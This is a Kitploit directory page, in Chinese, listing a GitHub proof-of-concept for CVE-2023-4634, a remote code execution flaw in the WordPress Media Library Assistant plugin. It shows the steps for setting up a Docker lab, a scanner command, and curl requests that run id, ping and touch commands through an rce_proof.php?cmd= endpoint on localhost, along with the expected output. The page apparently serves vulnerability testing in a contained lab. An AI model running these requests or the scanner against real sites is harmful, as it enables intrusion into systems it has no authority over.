Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-4634-PoC — # CVE-2023-4634 的概念验证漏洞利用程序 针对 WordPress Media Library Assistant 插件中远程代码执行漏洞(CVE-2023-4634)的概念验证漏洞利用程序。包含基于 Docker 的易受攻击环境及自动化扫描器。 | Kitploit
工具/GitHubGitHub/evillm/cve-2023-4634-poc
漏洞分析代码分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubevillm/cve-2023-4634-poc

CVE-2023-4634-PoC

# CVE-2023-4634 的概念验证漏洞利用程序 针对 WordPress Media Library Assistant 插件中远程代码执行漏洞(CVE-2023-4634)的概念验证漏洞利用程序。包含基于 Docker 的易受攻击环境及自动化扫描器。

查看仓库
137个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-4634 - WordPress 插件 Media Library Assistant 中的 RCE 漏洞

1. 构建并启动环境

root@kitploit:~
cd Stand
docker-compose up --build -d

2. 等待服务启动(60秒)

root@kitploit:~
sleep 60
curl -I http://localhost:8080

3. 运行漏洞扫描

root@kitploit:~
cd ../PoC/src
python3 scanner.py http://localhost:8080

4. 手动测试 RCE

root@kitploit:~
# Тест команды id
curl "http://localhost:8080/rce_proof.php?cmd=id"

# Тест команды ping
curl "http://localhost:8080/rce_proof.php?cmd=ping+-c+2+127.0.0.1"

# Создание файла-доказательства
curl "http://localhost:8080/rce_proof.php?cmd=touch+/tmp/rce_proof"

✅ 预期结果

scanner.py 输出:

root@kitploit:~
[*] Scanning: http://localhost:8080
[+] WordPress is accessible
[+] Plugin found: v3.09
[+] Plugin is VULNERABLE!
[*] Testing RCE...
[+] id command executed
[+] ping command executed
[+] file_check command executed
[+] RCE CONFIRMED!
[+] Results saved to ../result.txt

result.txt 内容:

root@kitploit:~
{
  "cve": "CVE-2023-4634",
  "target": "http://localhost:8080",
  "timestamp": "2025-12-21 13:49:19",
  "vulnerable": true,
  "findings": {
    "wordpress": true,
    "plugin_vulnerable": true,
    "rce_id": true,
    "rce_id_output": "uid=33(www-data) gid=33(www-data) groups=33(www-data)",
    "rce_ping": true,
    "rce_file_check": true
  },
  "plugin_version": "3.09",
  "status": "VULNERABLE"
}

🔧 技术规格

网络:

  • WordPress: 172.20.0.2:80(可通过 localhost:8080 访问)
  • 数据库: 172.20.0.3:3306
  • 网络: 172.20.0.0/24

要求:

  • CVE: CVE-2023-4634
  • 受影响组件: Media Library Assistant 插件 < 3.10
  • 漏洞类型: 远程代码执行(RCE)
  • 系统要求: Docker、Python 3.7+

📊 RCE 证明

  • ✅ 通过 HTTP 执行 id 命令
  • ✅ 通过 HTTP 执行 ping 命令
  • ✅ 在 /tmp/ 中创建文件
  • ✅ 确认 www-data 权限
  • ✅ 结果已记录在 result.txt 中

🧹 清理

root@kitploit:~
cd Stand
docker-compose down -v
下载工具